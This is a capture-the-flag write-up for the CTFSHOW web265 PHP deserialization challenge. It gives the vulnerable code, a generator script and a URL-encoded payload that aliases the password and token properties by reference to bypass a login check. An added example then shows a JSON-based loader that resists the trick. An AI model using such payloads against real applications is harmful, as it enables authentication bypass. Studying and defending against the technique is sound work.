CTFSHOW web265
<?php
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);

class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }

    public function login(){
        return $this->token===$this->password;
    }
}

// The request parameter is deserialized directly into an object
$ctfshow = unserialize($_GET['ctfshow']);
// token is overwritten with a random value after deserialization
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
    echo $flag;
}
?>
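Make the password property point to the address of the token property (a PHP reference); then no matter how token changes, the two always stay equal.
Code to generate the payload: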
<?php
class ctfshowAdmin{
    public $token=1;
    public $password=2;
}

$a = new ctfshowAdmin();
// Bind password to token by reference; serialize() records this as R:2
$a->password = &$a->token;
echo urlencode(serialize($a));
?>
payload:
O%3A12%3A%22ctfshowAdmin%22%3A2%3A%7Bs%3A5%3A%22token%22%3Bi%3A1%3Bs%3A8%3A%22password%22%3BR%3A2%3B%7D
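The aliasing described above next to a loader that cannot carry it, as an added example that is not part of the original write-up or the challenge. It assumes the request can be sent as JSON; loadAdmin() is a hypothetical helper, and login() is changed here to a string-only, constant-time comparison.

```php
<?php
// Added example (not the challenge's code): the aliasing from the write-up,
// then a loader that cannot carry it. loadAdmin() is a hypothetical helper.
class ctfshowAdmin {
    public $token;
    public $password;
    public function __construct($t, $p) { $this->token = $t; $this->password = $p; }
    public function login() {
        // Constant-time comparison; both sides must be strings.
        return is_string($this->token) && is_string($this->password)
            && hash_equals($this->token, $this->password);
    }
}

// The write-up's payload, URL-decoded.
$payload = 'O:12:"ctfshowAdmin":2:{s:5:"token";i:1;s:8:"password";R:2;}';

// Before: unserialize() honours R:2, so password aliases token and the
// later server-side assignment changes both properties at once.
$aliased = unserialize($payload);
$aliased->token = md5(mt_rand());
echo "unserialize: ", var_export($aliased->login(), true), PHP_EOL;

// After: accept JSON, which has no class or reference syntax, and copy only
// a scalar string into a freshly constructed object.
function loadAdmin(string $raw): ?ctfshowAdmin {
    $data = json_decode($raw, true);
    if (!is_array($data)) {
        return null;                       // not a JSON object
    }
    $password = $data['password'] ?? null;
    if (!is_string($password)) {
        return null;                       // reject arrays, numbers, null
    }
    // The token never comes from the request; random_bytes() is a CSPRNG.
    return new ctfshowAdmin(bin2hex(random_bytes(16)), $password);
}

// Constructed sample inputs: a JSON request and the original payload.
foreach (['{"token":"x","password":"x"}', $payload] as $raw) {
    $admin = loadAdmin($raw);
    echo "json: ", var_export($admin !== null && $admin->login(), true), PHP_EOL;
}
```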
From: https://blog.51cto.com/u_16350624/8316025